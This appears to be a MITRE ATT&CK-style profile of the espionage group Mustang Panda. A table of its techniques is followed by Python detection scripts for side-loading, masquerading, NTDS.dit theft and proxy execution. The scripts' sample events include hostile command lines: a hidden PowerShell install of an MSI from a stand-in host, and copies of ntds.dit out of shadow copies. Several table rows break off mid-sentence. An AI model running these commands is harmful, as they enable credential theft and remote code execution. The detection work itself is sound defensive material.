Mustang Panda is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. Mustang Panda has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.[1][2][3]
Domain | ID | Name | Use
---|---|---|---
Enterprise | T1583.001 | Acquire Infrastructure: Domains | Mustang Panda has acquired C2 domains prior to operations.[3][5][8] Mustang Panda registered adversary-controlled domains during RedDelta Modified PlugX Infection Chain Operations that were re-registrations of expired domains.[7]
Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | Mustang Panda has communicated with its C2 via HTTP POST requests.[2][3][5][8] Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1560.001 | Archive Collected Data: Archive via Utility | Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration.[3][9]
Enterprise | T1560.003 | Archive Collected Data: Archive via Custom Method | Mustang Panda has encrypted documents with RC4 prior to exfiltration.[9]
Enterprise | T1119 | Automated Collection | Mustang Panda used custom batch scripts to collect files automatically from a targeted system.[3]
Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Mustang Panda has created the registry key Mustang Panda used Run registry keys with names such as
Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | Mustang Panda has used malicious PowerShell scripts to enable execution.[1][2] Mustang Panda used LNK files to execute PowerShell commands leading to eventual PlugX installation during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Mustang Panda has executed HTA files via cmd.exe and used batch scripts for collection.[2][9]
Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic | Mustang Panda has embedded VBScript components in LNK files to download additional files and automate collection.[1][2][3]
Enterprise | T1074.001 | Data Staged: Local Data Staging | Mustang Panda has stored collected credential files in
Enterprise | T1573.001 | Encrypted Channel: Symmetric Cryptography | Mustang Panda has encrypted C2 communications with RC4.[5]
Enterprise | T1585.002 | Establish Accounts: Email Accounts | Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.[6]
Enterprise | T1546.003 | Event Triggered Execution: Windows Management Instrumentation Event Subscription | Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence.[3]
Enterprise | T1480 | Execution Guardrails | Mustang Panda used Cloudflare geofencing to limit payload download activity during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1052.001 | Exfiltration Over Physical Medium: Exfiltration over USB | Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.[9]
Enterprise | T1203 | Exploitation for Client Execution | Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.[1] Mustang Panda used the GrimResource exploitation technique via specially crafted MSC files for arbitrary code execution during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1083 | File and Directory Discovery | Mustang Panda has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.[9]
Enterprise | T1564.001 | Hide Artifacts: Hidden Files and Directories | Mustang Panda's PlugX variant has created a hidden folder on USB drives named Mustang Panda stored encrypted payloads associated with PlugX installation in hidden directories during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1574.001 | Hijack Execution Flow: DLL | Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file.[2][5][4] Mustang Panda used DLL search order hijacking on vulnerable applications to install PlugX payloads during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1070.004 | Indicator Removal: File Deletion | Mustang Panda deletes its tools and files and kills processes once its objectives are reached.[3]
Enterprise | T1105 | Ingress Tool Transfer | Mustang Panda has downloaded additional executables following the initial infection stage.[5]
Enterprise | T1036.004 | Masquerading: Masquerade Task or Service | Mustang Panda masqueraded Registry run keys as legitimate-looking service names such as
Enterprise | T1036.005 | Masquerading: Match Legitimate Resource Name or Location | Mustang Panda has used names like
Enterprise | T1036.007 | Masquerading: Double File Extension | Mustang Panda has used an additional filename extension to hide the true file type.[1][2]
Enterprise | T1095 | Non-Application Layer Protocol | Mustang Panda communicated over TCP port 5000 from adversary administrative servers to adversary command and control nodes during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1027 | Obfuscated Files or Information | Mustang Panda has delivered initial payloads hidden using archives and encoding measures.[1][2][3][5][4][6]
Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Mustang Panda stored installation payloads as encrypted files in hidden folders during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1027.016 | Obfuscated Files or Information: Junk Code Insertion | Mustang Panda has used junk code within its DLL files to hinder analysis.[9]
Enterprise | T1588.004 | Obtain Capabilities: Digital Certificates | Mustang Panda acquired Cloudflare Origin CA TLS certificates during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1003.003 | OS Credential Dumping: NTDS | Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used
Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Mustang Panda has used spearphishing attachments to deliver initial access payloads.[5][4][10] Mustang Panda leveraged malicious attachments in spearphishing emails for initial access to victim environments in RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1566.002 | Phishing: Spearphishing Link | Mustang Panda has delivered malicious links to its intended targets.[8] Mustang Panda distributed malicious links in phishing emails leading to HTML files that directed the victim to malicious MSC files when User-Agent fingerprinting indicated a Windows host during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1598.003 | Phishing for Information: Spearphishing Link | Mustang Panda has delivered web bugs to profile its intended targets.[6]
Enterprise | T1057 | Process Discovery | Mustang Panda has used
Enterprise | T1090 | Proxy | Mustang Panda proxied communication through the Cloudflare CDN service during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1219.002 | Remote Access Tools: Remote Desktop Software | Mustang Panda has installed TeamViewer on targeted systems.[3]
Enterprise | T1091 | Replication Through Removable Media | Mustang Panda has used a customized PlugX variant which could spread through USB connections.[9]
Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence.[2][3][8]
Enterprise | T1518 | Software Discovery | Mustang Panda has searched the victim system for the
Enterprise | T1608 | Stage Capabilities | Mustang Panda has used servers under its control to validate tracking pixels sent to phishing victims.[6]
Enterprise | T1608.001 | Stage Capabilities: Upload Malware | Mustang Panda has hosted malicious payloads on DropBox including PlugX.[6] Mustang Panda staged malware on adversary-controlled domains and cloud storage instances during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1553.002 | Subvert Trust Controls: Code Signing | Mustang Panda used legitimate, signed binaries such as
Enterprise | T1218.004 | System Binary Proxy Execution: InstallUtil | Mustang Panda has used
Enterprise | T1218.005 | System Binary Proxy Execution: Mshta | Mustang Panda has used mshta.exe to launch collection scripts.[3]
Enterprise | T1218.007 | System Binary Proxy Execution: Msiexec | Mustang Panda's initial payloads downloaded a Windows Installer (MSI) file that in turn dropped follow-on files leading to installation of PlugX during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1218.014 | System Binary Proxy Execution: MMC | Mustang Panda used Microsoft Management Console Snap-In Control files, or MSC files, executed via MMC to run follow-on PowerShell commands during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1082 | System Information Discovery | Mustang Panda has gathered system information using Mustang Panda captured victim operating system type via User Agent analysis during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1016 | System Network Configuration Discovery | Mustang Panda has used
Enterprise | T1049 | System Network Connections Discovery | Mustang Panda has used
Enterprise | T1204.001 | User Execution: Malicious Link | Mustang Panda has sent malicious links including links directing victims to a Google Drive folder.[1][8][6] Mustang Panda distributed hyperlinks that would result in an MSC file running a PowerShell command to download and install a remotely hosted MSI file during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1204.002 | User Execution: Malicious File | Mustang Panda has sent malicious files requiring direct victim interaction to execute.[1][2][9][5][10][6] Mustang Panda distributed malicious LNK objects for user execution during RedDelta Modified PlugX Infection Chain Operations.[7]
Enterprise | T1102 | Web Service | Mustang Panda has used DropBox URLs to deliver variants of PlugX.[6]
Enterprise | T1047 | Windows Management Instrumentation | Mustang Panda has executed PowerShell scripts via WMI.[2][3]
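The T1574.001 row above describes the signed-host-plus-malicious-DLL pattern (a legitimately signed executable side-loading a PlugX DLL via search-order hijacking). The hunt below is an added example written for this page, not code from MITRE or from any of the cited reports: it flags image-load events where a signed executable running from a user-writable directory loads an unsigned DLL that sits beside it. The events are constructed for illustration using Sysmon Event ID 7 field names; the two fields `ProcessSigned` and `ProcessSignature` are an assumption (they would come from joining the loader's process-creation record), and the `COMMONLY_HIJACKED` name list is illustrative rather than taken from the page.

```python
"""Hunt for DLL side-loading / search-order hijacking (T1574.001).

Flags image-load events where a *signed* executable in a user-writable
directory loads an *unsigned* DLL from its own directory. Added example;
event records are constructed, not real telemetry.
"""
import ntpath
import re

# Locations a standard user can write to. A legitimate signed EXE
# normally runs from Program Files or System32, not from here.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)"
    r"|programdata|windows\\temp|users\\public)\\",
    re.IGNORECASE,
)

# Illustrative DLL names that side-loaders commonly supply in place of a
# system DLL of the same name (assumption, not from the page).
COMMONLY_HIJACKED = {"version.dll", "dwmapi.dll", "winmm.dll", "cryptsp.dll"}

# Constructed events (Sysmon Event ID 7 style plus assumed Process* fields).
SAMPLE_EVENTS = [
    {   # signed EXE dropped to AppData loads an unsigned DLL beside it
        "Image": r"C:\Users\alice\AppData\Roaming\AdobeUpdate\AdobeUpdater.exe",
        "ImageLoaded": r"C:\Users\alice\AppData\Roaming\AdobeUpdate\version.dll",
        "Signed": "false", "Signature": "",
        "ProcessSigned": "true", "ProcessSignature": "Adobe Inc.",
    },
    {   # the same signed app installed properly loads the real system DLL
        "Image": r"C:\Program Files\Adobe\AdobeUpdater.exe",
        "ImageLoaded": r"C:\Windows\System32\version.dll",
        "Signed": "true", "Signature": "Microsoft Windows",
        "ProcessSigned": "true", "ProcessSignature": "Adobe Inc.",
    },
    {   # signed EXE in ProgramData loads an unsigned DLL from its own directory
        "Image": r"C:\ProgramData\Updater\svchost.exe",
        "ImageLoaded": r"C:\ProgramData\Updater\helper.dll",
        "Signed": "false", "Signature": "",
        "ProcessSigned": "true", "ProcessSignature": "Example Vendor Ltd",
    },
    {   # unsigned EXE loading an unsigned DLL: suspicious, but not side-loading
        "Image": r"C:\Users\bob\Downloads\tool.exe",
        "ImageLoaded": r"C:\Users\bob\Downloads\tool.dll",
        "Signed": "false", "Signature": "",
        "ProcessSigned": "false", "ProcessSignature": "",
    },
]


def sideload_reasons(ev):
    """Return the reasons an image-load event looks like side-loading.

    The signed-host / unsigned-DLL pair and the same-directory condition are
    mandatory; the remaining reasons raise confidence. An empty list means
    the event does not match."""
    exe_dir = ntpath.dirname(ev["Image"]).lower()
    dll_dir = ntpath.dirname(ev["ImageLoaded"]).lower()
    dll_name = ntpath.basename(ev["ImageLoaded"]).lower()
    if ev["ProcessSigned"].lower() != "true" or ev["Signed"].lower() == "true":
        return []
    if exe_dir != dll_dir:
        return []
    reasons = ["signed host process loaded an unsigned DLL",
               "DLL resides in the executable's own directory"]
    if USER_WRITABLE.match(ev["Image"]):
        reasons.append("executable runs from a user-writable location")
    if dll_name in COMMONLY_HIJACKED:
        reasons.append(f"{dll_name} is a commonly hijacked system DLL name")
    return reasons


def hunt(events):
    """Return one finding per event that satisfies the mandatory conditions."""
    findings = []
    for ev in events:
        reasons = sideload_reasons(ev)
        if reasons:
            findings.append({"image": ev["Image"], "dll": ev["ImageLoaded"],
                             "signer": ev["ProcessSignature"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['signer']!r} binary {f['image']} loaded {f['dll']}")
        for r in f["reasons"]:
            print("   -", r)
```

The fourth sample event is deliberately not flagged: an unsigned loader with an unsigned DLL is ordinary malware, not the side-loading shape the row describes, and keeping the signed-host condition mandatory is what keeps this rule precise on a busy endpoint.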
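The T1036.007 and T1204.002 rows above describe an additional filename extension hiding the true file type, and malicious LNK objects handed to the user. Windows Explorer hides known extensions by default, so `Report.pdf.lnk` is shown as `Report.pdf`. The triage helper below is an added example, not code from the page or the cited reports: it flags names whose final (real) extension is executable while the preceding (displayed) extension claims a document or image. It also strips whitespace padding between the two extensions; that padding trick is a generalization beyond what the page states and is an assumption about attacker habits. The sample listing is constructed.

```python
"""Spot double-extension masquerading (T1036.007) in a file listing.

Added example; SAMPLE_NAMES are constructed, not taken from a real case.
"""
import ntpath

# Extensions a user expects to be harmless to open.
DOCUMENT_EXT = {"doc", "docx", "rtf", "pdf", "ppt", "pptx", "xls", "xlsx",
                "txt", "csv", "jpg", "jpeg", "png", "gif"}
# Extensions Windows will execute or hand to a script/shell host.
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "lnk", "hta", "js", "jse",
                  "vbs", "vbe", "wsf", "wsh", "bat", "cmd", "msi", "msc",
                  "ps1", "dll", "cpl"}


def double_extension(filename):
    """Return (displayed_ext, real_ext) if the name masquerades, else None.

    Whitespace around each extension is stripped so that a padded name such
    as 'agenda.docx          .lnk' is still caught (assumed attacker habit)."""
    name = ntpath.basename(filename)
    parts = [p.strip().lower() for p in name.split(".")]
    if len(parts) < 3:               # need at least base.ext1.ext2
        return None
    displayed, real = parts[-2], parts[-1]
    if real in EXECUTABLE_EXT and displayed in DOCUMENT_EXT:
        return displayed, real
    return None


def triage(filenames):
    """Return (filename, displayed_ext, real_ext) for every suspicious name."""
    hits = []
    for fn in filenames:
        result = double_extension(fn)
        if result:
            hits.append((fn, *result))
    return hits


# Constructed sample listing, e.g. names pulled from an archive attachment.
SAMPLE_NAMES = [
    r"C:\Users\alice\Downloads\Invoice_2024.pdf.exe",
    r"Meeting agenda.docx                 .lnk",   # padded so .lnk scrolls out of view
    r"Policy update.pptx.scr",
    r"quarterly_report.xlsx",
    r"archive.tar.gz",
    r"setup.exe",
    r"photo.jpg.js",
]

if __name__ == "__main__":
    for fn, shown, real in triage(SAMPLE_NAMES):
        print(f"{fn!r}: displayed as .{shown}, actually .{real}")
```

Names such as `archive.tar.gz` are not flagged because the real extension is not executable; the rule keys on the combination, not on the mere presence of two dots.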
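The T1003.003 row above records vssadmin being used to create a volume shadow copy from which NTDS.dit is retrieved. The detection below is an added example, not code from the page or the cited reports: it correlates process-creation events per host, pairing a `vssadmin create shadow` with any later command in the window that reads `ntds.dit` through a `HarddiskVolumeShadowCopy` device path, and still reports the read when no creation was seen (the snapshot may have been made earlier or by another tool). The log records and the field names `ts`, `host`, `image`, `cmdline` are constructed assumptions about the log source.

```python
"""Detect NTDS.dit theft via a volume shadow copy (T1003.003).

Added example; SAMPLE_EVENTS are constructed, not real telemetry.
"""
import re
from datetime import datetime, timedelta

SHADOW_CREATE = re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)
# ntds.dit read through a shadow-copy device path, e.g.
# \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit
NTDS_FROM_SHADOW = re.compile(r"harddiskvolumeshadowcopy\d+.*\\ntds\.dit\b", re.I)
WINDOW = timedelta(minutes=30)


def detect_ntds_shadow_theft(events, window=WINDOW):
    """Return one finding per ntds.dit read from a shadow copy.

    Each finding notes whether a vssadmin create shadow was observed on the
    same host within `window` before the read."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)

    findings = []
    for host, evs in by_host.items():
        creates = [e["ts"] for e in evs if SHADOW_CREATE.search(e["cmdline"])]
        for e in evs:
            if not NTDS_FROM_SHADOW.search(e["cmdline"]):
                continue
            paired = any(timedelta(0) <= e["ts"] - c <= window for c in creates)
            findings.append({"host": host, "ts": e["ts"], "image": e["image"],
                             "cmdline": e["cmdline"], "shadow_create_seen": paired})
    return findings


# Constructed process-creation events (not real telemetry).
T0 = datetime(2024, 5, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    # dc01: the full pattern, snapshot creation then a copy out of the snapshot
    {"ts": T0, "host": "dc01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe create shadow /for=C:"},
    {"ts": T0 + timedelta(minutes=2), "host": "dc01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp\n.dit"},
    {"ts": T0 + timedelta(minutes=3), "host": "dc01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /for=C: /quiet"},
    # fs02: a backup agent creating a shadow copy; nothing touches ntds.dit
    {"ts": T0 - timedelta(hours=1), "host": "fs02", "image": r"C:\Program Files\Backup\agent.exe",
     "cmdline": "vssadmin create shadow /for=D:"},
    # dc02: ntds.dit read from a snapshot with no creation seen in the window
    {"ts": T0 + timedelta(hours=1), "host": "dc02", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit \\fs02\share\n.dit"},
]

if __name__ == "__main__":
    for f in detect_ntds_shadow_theft(SAMPLE_EVENTS):
        tag = "with" if f["shadow_create_seen"] else "WITHOUT"
        print(f"[{f['host']}] {f['ts']:%H:%M} ntds.dit read from shadow copy "
              f"{tag} a prior vssadmin create on this host")
```

The shadow-copy creation on its own is not alerted on, because backup software does exactly that; the signal is the read of `ntds.dit` out of the snapshot, and the creation only adds context.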
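The T1218.004/.005/.007/.014 rows above, together with the T1203 GrimResource entry, describe one proxy-execution chain: a crafted MSC file opened in MMC runs PowerShell, which fetches a remote MSI for msiexec, while mshta.exe launches collection scripts and InstallUtil proxies a payload. The classifier below is an added example, not code from the page or the cited reports. Each rule encodes one observable from that chain; the InstallUtil rule keys on the `/U` switch, a widely documented way to run an assembly's uninstall method, and is a generic rule because the page does not detail Mustang Panda's exact InstallUtil usage. Events are constructed with Sysmon Event ID 1 style fields (`Image`, `ParentImage`, `CommandLine`); the hostname `example.invalid` and all paths are placeholders.

```python
"""Flag system-binary proxy execution chains (T1218.004/.005/.007/.014).

Added example; SAMPLE_EVENTS are constructed, not real telemetry.
"""
import ntpath
import re

URL = re.compile(r"https?://", re.I)
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def _base(path):
    return ntpath.basename(path).lower()


def _from_system_dir(path):
    return ntpath.dirname(path).lower() in SYSTEM_DIRS


def classify(ev):
    """Return (technique_id, description) for a process-creation event, or None."""
    image, parent, cmd = _base(ev["Image"]), _base(ev["ParentImage"]), ev["CommandLine"]
    cmd_l = cmd.lower()

    # T1218.014: mmc.exe (the MSC host) spawning a shell, i.e. an MSC running commands.
    if parent == "mmc.exe" and image in ("powershell.exe", "pwsh.exe", "cmd.exe"):
        return "T1218.014", "mmc.exe spawned a shell (MSC file executing commands)"
    # mmc.exe opening a .msc from a user path rather than from System32.
    if image == "mmc.exe":
        m = re.search(r'"?([^"\s]+\.msc)"?', cmd, re.I)
        if m and not _from_system_dir(m.group(1)):
            return "T1218.014", f"mmc.exe opened non-system MSC {m.group(1)}"
    # T1218.005: mshta running inline script, a remote HTA, or an HTA from disk.
    if image == "mshta.exe":
        if re.search(r"\b(vbscript|javascript):", cmd_l) or URL.search(cmd) or ".hta" in cmd_l:
            return "T1218.005", "mshta.exe executing script or HTA"
    # T1218.007: msiexec installing a package straight from a URL.
    if image == "msiexec.exe" and URL.search(cmd) and re.search(r"(^|\s)/(i|package)\b", cmd_l):
        return "T1218.007", "msiexec.exe installing package from remote URL"
    # T1218.004: InstallUtil with /U, which runs the assembly's Uninstall method.
    if image == "installutil.exe" and re.search(r"(^|\s)/u\b", cmd_l):
        return "T1218.004", "installutil.exe /U proxy execution"
    return None


def scan(events):
    """Run classify() over a batch; return (image, technique, description) hits."""
    hits = []
    for ev in events:
        res = classify(ev)
        if res:
            hits.append((ev["Image"], *res))
    return hits


# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Users\alice\Downloads\Agenda.msc"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": "powershell.exe -w hidden -c Start-Process msiexec.exe -ArgumentList '/i https://example.invalid/u.msi /qn'"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "msiexec.exe /i https://example.invalid/u.msi /qn"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\AppData\Local\Temp\collect.hta"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\alice\AppData\Local\Temp\s.dll"},
    # benign: an administrator opening the Services console
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" C:\Windows\System32\services.msc'},
    # benign: a local MSI install from Downloads
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\installer.msi"'},
]

if __name__ == "__main__":
    for image, tid, why in scan(SAMPLE_EVENTS):
        print(f"{tid}  {_base(image):16} {why}")
```

The two benign events show where the precision comes from: `services.msc` lives in System32, so the MSC rule does not fire, and a local MSI install has no URL, so the msiexec rule stays quiet. In a real environment the parent-child rule for mmc.exe is the strongest of the four, since MMC has no legitimate reason to spawn PowerShell.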